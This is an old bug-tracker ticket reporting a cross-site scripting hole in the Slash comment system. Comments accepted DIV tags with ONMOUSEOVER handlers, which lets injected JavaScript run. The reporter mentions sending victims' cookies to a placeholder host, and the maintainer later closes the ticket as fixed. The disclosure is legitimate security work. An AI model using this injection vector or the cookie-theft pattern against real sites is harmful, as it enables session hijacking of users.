#21 JavaScript Injection - Security Hole

closed-fixed
Comments (601)
9
2000-05-01
2000-04-27
No

Test Case: <A HREF="http://beta.slashdot.org/comments.pl?sid=00/04/27/1429226&cid=418">http://beta.slashdot.org/comments.pl?sid=00/04/27/1429226&cid=418</A>

(erm, does this accept HTML? Incase not, I'll just start again.)

Test Case: http://beta.slashdot.org/comments.pl?sid=00/04/27/1429226&cid=418

JavaScript can be injected into comments using <DIV ONMOUSEOVER="...">, the user does have to pass his mouse over your comment, but thats hardly an uncommon thing, especially if you make the comment a large first post...

My demo just displays the cookie, but setting it to open "http://some.host/some.script?cookie=<foo>", and storing a list of users cookies would be trivial.

Discussion

  • Anonymous

    Anonymous - 2000-04-27

    (I guess this doesn't support HTML.. slashdot spoils me :)

    OK. Since I was bored, and had basically nothing else to do, I improved my test case slightly.

    <P .*?> and <DIV .*?> are both accepted by Slash. I've not tested <P> for javascript hooks, but at least <DIV> supports ONMOUSEOVER, and ONMOUSEOUT ONMOUSEMOVE, etc.
    The only 'valid' parameter for <DIV> is ALIGN.. so either stripping <DIV> support entirely, or only allowing <DIV ALIGN="(?:left|right|center)"> would defeat *this* hole -- there may be other possible points to stuff javascript into Slash and get exactly the same effect (using IE, at least, I haven't tested netscape -- anyone?)

     
  • Chris Nandor

    Chris Nandor - 2000-04-29

    Known, and fixing. These "exploits" work with IE, not with Netscape, apparently. Slashdot has said for some time you could use P .* and DIV .* tags, but this was not true. I made it true on the beta site, opening up the door to these things. I'll close that door soon. :-)

     
  • Chris Nandor

    Chris Nandor - 2000-04-29
    • priority: 5 --> 9
    • assigned_to: nobody --> pudge
     
  • Chris Nandor

    Chris Nandor - 2000-05-01

    Alrighty, fixed. Thanks.

     
  • Chris Nandor

    Chris Nandor - 2000-05-01
    • status: open --> closed-fixed
     

Log in to post a comment.